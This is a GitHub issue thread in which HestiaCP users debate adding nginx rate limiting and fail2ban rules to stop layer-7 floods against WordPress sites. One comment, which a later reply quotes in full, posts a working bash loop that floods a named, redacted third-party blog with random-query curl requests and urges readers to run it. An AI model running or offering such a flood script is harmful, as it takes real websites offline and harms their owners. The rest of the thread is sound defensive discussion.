### ISSUE TITLE
[FEATURE] Nginx Rate Limiter Template

### ISSUE THREAD

**Issue by erikdemarco** [hestiacp/hestiacp#1951]
HestiaCP + Wordpress = Nightmare?

Hi. Why its so easy to take down any hestiacp site which use wordpress?

For testing I install Hestiacp, Wordpress, Wordfence, in 12gb VPS. I place this server behind cloudflare with security level set to high, and turn on bot protection.

Now open jmeter, attack this site with random search parameter (?s=[RANDOM-HASH]). Just 50request/seconds already enough to make the site down. 

The only way to prevent this is by using nginx rate limiter. HestiaCP should add a rate limiter option as additional nginx template.

**Comment by ioannidesalex** [comment]
I agree rate limiting is a great feature. However its tricky to have default values that can accomodate both small sites and biggger (in terms of traffic) sites.

By the way do you use fastcgi cache? Do you hVe the default php-fpm max_children?

There is no one size fits all solution.

**Comment by jaapmarcus** [comment]
See: https://github.com/hestiacp/hestiacp/issues/784

I am fine with adding support for it feel free to submit a pull request 

It might be hard to pin point the most idea settings

https://github.com/myvesta/vesta/blob/master/src/deb/for-download/tools/rate-limit-tpl/install_rate_limit_tpl.sh

**Comment by jlguerrerosanz** [comment]
Set a high limit then. High traffic sites will be okay and low traffic sites may be okay.

As a complement to this measure we could have fail2ban limit the rate too.

**Comment by bet0x** [comment]
I don't see the point on having this as a template. Is a feature that requires to be manually adjusted every single time. Most of people are totally unfamiliar with this kind of configurations, is better to get a WAF maybe. 

Even Cloudflare can work well here. Or https://github.com/nbs-system/naxsi/wiki/integration-fail2ban

**Comment by erikdemarco** [comment]
@bet0x  Next time test first before you comment. I told you before my wp site is behind cloudflare. I activate security level to high, turn on the bot protection. Its not protect you from this kind of attack. This is called L7 attack. Cloudflare seems not care if the request/seconds is just thundreds or thousands/second (I told you I can bring down wp site using hestiacp+CF just by sending 50reqs/sec random search reqs enough to make medium vps down. 50req/sec looks miniscule to CF so it won't block it. The only way to protect using cloudflare is by setting security level to "I'm under attack" which is bad for UX. And using cf rate limiter which is cost very expensive.

I don't see the point on not having this as a template. 
1. If people don't want it they don't need to use this template.
2. We can set the limit to a high value (for example 20req/sec or 1200/min just for dynamic content like php, for static content we don't care about it). It's better than nothing at all. It will be good for 90% of people. For the rest 10% they will not activate this template.

**Comment by erikdemarco** [comment]
> Even Cloudflare can work well here. Or https://github.com/nbs-system/naxsi/wiki/integration-fail2ban

Fail2ban is good for blocking SSH login brute force. The way fail2ban is by scanning a log file for failed logln attempt every couple minutes. For blocking login brute force it's okay.

But if you say using fail2ban to block layer 7 ddos attack. Are you trying to be sarcasm or joking here? I don't see the point on this. Please eli5 to me.

**Comment by jlguerrerosanz** [comment]
Use fail2ban to read apache log and treat every single line of the log as a fail for the IP
Then set a thereshold of 300 requests in 300 seconds.

**Comment by jaapmarcus** [comment]
For Nginx + FPM we would need about 30 x different options = new templates. For Apache2  it might work but still requires a lot of  work... 

F2B is a memory hog an not suited for a lot of traffic...

**Comment by jlguerrerosanz** [comment]
It's true that fail2ban may consume ram but the continuous tries to scan for vulnerabilities sometimes put my 4 CPUs to a cpu oad of 30.

Which is worse? Being under constant hacking attempts and have my machine busy dealing with that crap or a high memory hog.

If I get fail2ban to work fine and not ban search engine bots for some time will you support that feature in hestia?

**Comment by jaapmarcus** [comment]
I don't think we should not enable it default. 

> Which is worse? Being under constant hacking attempts and have my machine busy dealing with that crap or a high memory hog.

I don't know but my website are usually not under such attacks that they require such things...

**Comment by jlguerrerosanz** [comment]
It could be disabled by default but integrated with the panel so that the bans are displayed in the IP list.

**Comment by jlguerrerosanz** [comment]
The other approach I tried is a netstat watchdog that filters offending c-classes and bans them altogether.

I got interesting results with that.

**Comment by bet0x** [comment]
> It's true that fail2ban may consume ram but the continuous tries to scan for vulnerabilities sometimes put my 4 CPUs to a cpu oad of 30.
> 
> Which is worse? Being under constant hacking attempts and have my machine busy dealing with that crap or a high memory hog.
> 
> If I get fail2ban to work fine and not ban search engine bots for some time will you support that feature in hestia?

Can you share the details of your resources? RAM/CPU.

**Comment by jlguerrerosanz** [comment]
Vps 4cpu @ 2600 MHz 4GB ram

**Comment by ManuelReschke** [comment]
@erikdemarco show us your php-fpm settings for your website. I think your VPS is wrong configured. Mostly the database is the bottleneck.

Ratelimiting should only be a optional option.

**Comment by huemanbar** [comment]
@ManuelReschke @bet0x Just my 2cents, maybe the best way to prove is to show. Tell me your website i will be happy to show you how its done. Or I will give you one example. Let's try with this website REDACTED.org, a blog owned by a self-proclaimed security expert and he is using hestiacp (ask @bet0x if you dont believe me)

paste this simple bash script on your shell or temporary vps:
```
export url="https://www.REDACTED.org/"
get () {
    rand=$(($RANDOM * $RANDOM * $RANDOM))
    curl --silent --output /dev/null "$1$rand"
}
while true
do
    ( get $url & ) > /dev/null 2>&1
done
```

What this script do is hitting REDACTED.org with random strings while its running. After you do this, his website will become unresponsive. Even for testing I'm just using single ip on android phone, no sophisticated software nor spohisticated machine.

The only way he will be protected via this attack is ratelimit. Even wordfence or cloudflare will not help (except using cf ratelimit)

"Ratelimiting should only be a optional option."
Yes I agree. Even cpanel (the most used hosting panel) have this ratelimiting feature. They use mod_evasive.

**Comment by bet0x** [comment]
@huemanbar
> @ManuelReschke @bet0x Just my 2cents, maybe the best way to prove is to show. Tell me your website i will be happy to show you how its done. Or I will give you one example. Let's try with this website REDACTED.org, a blog owned by a self-proclaimed security expert and he is using hestiacp (ask @bet0x if you dont believe me)
> 
> paste this simple bash script on your shell or temporary vps:
> 
> ```
> export url="https://www.REDACTED.org/"
> get () {
>     rand=$(($RANDOM * $RANDOM * $RANDOM))
>     curl --silent --output /dev/null "$1$rand"
> }
> while true
> do
>     ( get $url & ) > /dev/null 2>&1
> done
> ```
> 
> What this script do is hitting REDACTED.org with random strings while its running. After you do this, his website will become unresponsive. Even for testing I'm just using single ip on android phone, no sophisticated software nor spohisticated machine.
> 
> The only way he will be protected via this attack is ratelimit. Even wordfence or cloudflare will not help (except using cf ratelimit)
> 
> "Ratelimiting should only be a optional option."
> Yes I agree. Even cpanel (the most used hosting panel) have this ratelimiting feature. They use mod_evasive.

1) You just created a new account to troll?
2) The website is on a low resource VPS without any prep, is a dev/testing server, not even running Hestia CP. 
3) Never claimed to be a security expert.

If you want not to mess with more templates, the best apporach is to implement fail2ban as i stated before, this works for me without implementing rate limiter zones:

```
[http-get-dos]
enabled = true
port = http,https
filter = http-get-dos
logpath = /var/log/apache2/domains/*.log
maxretry = 5
findtime = 100
bantime = 864000
action   = hestia[name=WEB]
```
Then the filter:
```
 # Fail2Ban configuration file filter.d/http-get-dos.conf
 [Definition]
 # Option: failregex 
 # Note: This regex will match any GET entry in your logs, so basically all valid and not valid entries are a match. 
 # You should set up in the jail.conf file, the maxretry and findtime carefully in order to avoid false positives. 
 failregex = ^<HOST> -.*"(GET|POST).* 
 ignoreregex =
```

And to clarify: I'm against such implementation because we might also need an UI to make it friendly, not everyone knows their users, websites, visit and frequency.  BUT if this has to be implemented then we can add an interface to fail2ban, again: 

https://www.lazertechnologies.com/blog/secure-your-api-from-ddos-attacks-with-nginx-and-fail2ban

Maybe an UI logic like this:
Website -> Enable Rate Limit -> [Zone, Rate]. So no template is needed. 
![imagen](https://user-images.githubusercontent.com/778862/126576646-41158aba-13f7-4bf0-b53f-91623a022da7.png)
